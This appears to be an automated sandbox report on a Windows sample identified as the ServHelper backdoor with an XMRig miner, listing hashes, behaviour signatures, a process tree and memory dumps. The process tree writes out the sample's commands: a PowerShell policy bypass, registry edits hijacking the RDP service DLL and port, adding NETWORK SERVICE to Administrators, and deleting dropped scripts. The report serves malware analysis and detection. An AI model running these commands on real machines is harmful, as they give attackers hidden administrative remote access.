Analysis
-
max time kernel
146s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-09-2021 14:52
General
-
Target
748b112881047820f530c202bb59488e.exe
-
Size
4.0MB
-
MD5
748b112881047820f530c202bb59488e
-
SHA1
edf77f969bf54a47b21e6179cbcabb4651706d7c
-
SHA256
82285ac0988c68f9b9ecc7649cb9c6a3f3ecb242dd198465dbd4236d7fa6a59c
-
SHA512
252640d935ce3c7885fa48496b1b9c405f5dc9e719eda9c965d5fec46f877c00a7d96b14acf7410fbef9dbbfa9723932b54cdc75084fdd54e492eaa8d6f37ad6
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"C:\Users\Admin\AppData\Local\Temp\748b112881047820f530c202bb59488e.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zea4ipco\zea4ipco.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14A2.tmp" "c:\Users\Admin\AppData\Local\Temp\zea4ipco\CSC3DC7E20752B24731AA2DA089C7149AA5.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RES14A2.tmpMD5
084ddb1c6737f163e50540ecefc58a13
SHA18e0f284bb0dd09c6019ecb926978b736c06c55a6
SHA2564d13695df14961657d82bed239e007674e5553ecd3a91109bf226734fba4663a
SHA5120cf33d8b9724336121e422ca79bad387c986daa5c6076e149eb1d040930f087142fff26235ffc1d7031c35512996b4dc0691d21cde397af3eaef120b7ade3fc0
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
9cc8773f50008a3bce99c9d5e6cf4635
SHA1855d5ab66b3d0735e73008659c4a199d4492c8cb
SHA256d3c9d4a6db3fcee8b9af72fa8cc0b776264357a9f55498852a5e0792aed8603c
SHA512959ad4270b888ae45fd0ebc12fa2fbb3f695eb26012337dfdf136add2e1bcdcb470266c2fcdb747617dde5eaeb682cf8034f5b5907ff6f17c95135fb0d343d80
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\zea4ipco\zea4ipco.dllMD5
61e2da191a1420181a0c6a7624447407
SHA14d381f4322dfb38d794682379b05431597dd91d1
SHA25671f57996319f11749daea57bdf6199d0a5121600277fc3e23ba705d285c94284
SHA5122c4b3943fbf4aafbd7cfb115d553fec7f15902c734258b54c13bd67ff6841c50980638ec56337b0f20ab49df0897ac757bd90fb7cd2bff07bd19d9df5946a019
-
\??\c:\Users\Admin\AppData\Local\Temp\zea4ipco\CSC3DC7E20752B24731AA2DA089C7149AA5.TMPMD5
7914094daddde29392f7295dc5b22d57
SHA1434a51b7daeedeff245801e3c72b39a72eca4720
SHA2561cf98526b529778dad21509bc14f2a4f669aca3e449f15056bf7561438b0069b
SHA512a2ae83665ff0b59c2faa60658e80376f522ccd69ca73e378cd3d529012f6ab1a02f67e3fdffd9a42d851af69c1560cc69d21e51400767b8f12285d56a544419a
-
\??\c:\Users\Admin\AppData\Local\Temp\zea4ipco\zea4ipco.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\zea4ipco\zea4ipco.cmdlineMD5
3a637a6d4efef754a180e656538430b8
SHA1b9bc1b5ff604bd766e031afe311c1eea7b7314a8
SHA256a1c57343e12e1415e863e022a1e4b27e2c45c2c887b4dd2bf5c77ff1da9b6ca4
SHA51239d7d4a694325546c8eed60cf5fa4a1ebadc800254c519443da0ed22895bace94e93aa4944c51684140e1ae0e9ec3ff5962b8d29faad1ede1fc4de1a36704801
-
memory/640-1006-0x0000000000000000-mapping.dmp
-
memory/648-146-0x0000000000000000-mapping.dmp
-
memory/656-1009-0x0000000000000000-mapping.dmp
-
memory/864-1002-0x0000000000000000-mapping.dmp
-
memory/940-149-0x0000000000000000-mapping.dmp
-
memory/1044-698-0x0000000004812000-0x0000000004813000-memory.dmpFilesize
4KB
-
memory/1044-684-0x0000000000000000-mapping.dmp
-
memory/1044-697-0x0000000004810000-0x0000000004811000-memory.dmpFilesize
4KB
-
memory/1044-742-0x000000007EE70000-0x000000007EE71000-memory.dmpFilesize
4KB
-
memory/1164-963-0x0000000000000000-mapping.dmp
-
memory/1428-1005-0x0000000000000000-mapping.dmp
-
memory/1812-964-0x0000000000000000-mapping.dmp
-
memory/1840-124-0x0000000007D40000-0x0000000007D41000-memory.dmpFilesize
4KB
-
memory/1840-115-0x0000000000FB0000-0x0000000000FB1000-memory.dmpFilesize
4KB
-
memory/1840-123-0x00000000058B0000-0x00000000058B1000-memory.dmpFilesize
4KB
-
memory/1840-122-0x0000000000FB4000-0x0000000000FB5000-memory.dmpFilesize
4KB
-
memory/1840-121-0x00000000058C0000-0x00000000058C1000-memory.dmpFilesize
4KB
-
memory/1840-120-0x0000000005BE0000-0x0000000005BE1000-memory.dmpFilesize
4KB
-
memory/1840-118-0x0000000000FB2000-0x0000000000FB3000-memory.dmpFilesize
4KB
-
memory/1840-119-0x0000000000FB3000-0x0000000000FB4000-memory.dmpFilesize
4KB
-
memory/1840-116-0x00000000052E0000-0x00000000056DF000-memory.dmpFilesize
4.0MB
-
memory/2040-1001-0x0000000000000000-mapping.dmp
-
memory/2356-1008-0x0000000000000000-mapping.dmp
-
memory/3112-1007-0x0000000000000000-mapping.dmp
-
memory/3160-1011-0x0000000000000000-mapping.dmp
-
memory/3188-136-0x0000000007D60000-0x0000000007D61000-memory.dmpFilesize
4KB
-
memory/3188-132-0x0000000007430000-0x0000000007431000-memory.dmpFilesize
4KB
-
memory/3188-1052-0x000000007EB50000-0x000000007EB51000-memory.dmpFilesize
4KB
-
memory/3188-125-0x0000000000000000-mapping.dmp
-
memory/3188-128-0x0000000004E20000-0x0000000004E21000-memory.dmpFilesize
4KB
-
memory/3188-129-0x0000000007080000-0x0000000007081000-memory.dmpFilesize
4KB
-
memory/3188-130-0x0000000007082000-0x0000000007083000-memory.dmpFilesize
4KB
-
memory/3188-131-0x00000000076C0000-0x00000000076C1000-memory.dmpFilesize
4KB
-
memory/3188-133-0x0000000007600000-0x0000000007601000-memory.dmpFilesize
4KB
-
memory/3188-135-0x0000000007F90000-0x0000000007F91000-memory.dmpFilesize
4KB
-
memory/3188-137-0x00000000086A0000-0x00000000086A1000-memory.dmpFilesize
4KB
-
memory/3188-138-0x0000000008600000-0x0000000008601000-memory.dmpFilesize
4KB
-
memory/3188-144-0x0000000009C60000-0x0000000009C61000-memory.dmpFilesize
4KB
-
memory/3188-145-0x0000000009320000-0x0000000009321000-memory.dmpFilesize
4KB
-
memory/3188-176-0x0000000009610000-0x0000000009611000-memory.dmpFilesize
4KB
-
memory/3188-153-0x0000000009280000-0x0000000009281000-memory.dmpFilesize
4KB
-
memory/3188-155-0x0000000007083000-0x0000000007084000-memory.dmpFilesize
4KB
-
memory/3292-1010-0x0000000000000000-mapping.dmp
-
memory/3508-1012-0x0000000000000000-mapping.dmp
-
memory/3680-198-0x0000000009220000-0x0000000009253000-memory.dmpFilesize
204KB
-
memory/3680-206-0x0000000009200000-0x0000000009201000-memory.dmpFilesize
4KB
-
memory/3680-186-0x00000000052F0000-0x00000000052F1000-memory.dmpFilesize
4KB
-
memory/3680-412-0x0000000008E70000-0x0000000008E71000-memory.dmpFilesize
4KB
-
memory/3680-406-0x0000000009430000-0x0000000009431000-memory.dmpFilesize
4KB
-
memory/3680-213-0x0000000009550000-0x0000000009551000-memory.dmpFilesize
4KB
-
memory/3680-177-0x0000000000000000-mapping.dmp
-
memory/3680-212-0x0000000009360000-0x0000000009361000-memory.dmpFilesize
4KB
-
memory/3680-211-0x000000007F600000-0x000000007F601000-memory.dmpFilesize
4KB
-
memory/3680-1025-0x0000000000000000-mapping.dmp
-
memory/3680-187-0x00000000052F2000-0x00000000052F3000-memory.dmpFilesize
4KB
-
memory/3712-1026-0x0000000000000000-mapping.dmp
-
memory/3784-441-0x00000000072E0000-0x00000000072E1000-memory.dmpFilesize
4KB
-
memory/3784-468-0x000000007F560000-0x000000007F561000-memory.dmpFilesize
4KB
-
memory/3784-442-0x00000000072E2000-0x00000000072E3000-memory.dmpFilesize
4KB
-
memory/3784-432-0x0000000000000000-mapping.dmp
-
memory/3980-962-0x0000000000000000-mapping.dmp